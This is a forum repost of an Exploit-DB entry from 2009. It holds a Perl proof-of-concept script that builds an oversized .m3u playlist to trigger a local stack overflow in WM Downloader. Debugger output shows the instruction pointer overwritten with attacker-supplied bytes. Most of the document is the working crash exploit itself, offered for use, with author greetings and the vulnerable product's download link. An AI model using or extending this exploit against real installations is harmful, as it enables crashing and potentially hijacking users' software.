Exploit WM Downloader - '.m3u' Local Stack Overflow (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8403
Проверка EDB
  1. Пройдено
Автор
CYBER-ZONE
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2009-1330 cve-2009-1329 cve-2009-1328 cve-2009-1327 cve-2009-1326 cve-2009-1325 cve-2009-1324
Дата публикации
2009-04-13
Код:
#!/usr/bin/perl
#
#
# *************************************************************
# *    WM Downloader (.M3U File) Local Stack Overflow POC     *
# *************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail   : [email protected]
# Home     : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz   : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/WMDownloader.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D00000
#EBX 00333D78 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F739C
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2FCE0
#EDI 00006619
#EIP 41414141
#
my $Header = "#EXTM3U\n";

my $ex="http://"."A" x 26121;

open(MYFILE,'>>KHAL.m3u');

print MYFILE $Header.$ex;

close(MYFILE);

# milw0rm.com [2009-04-13]
 
Источник
www.exploit-db.com

Похожие темы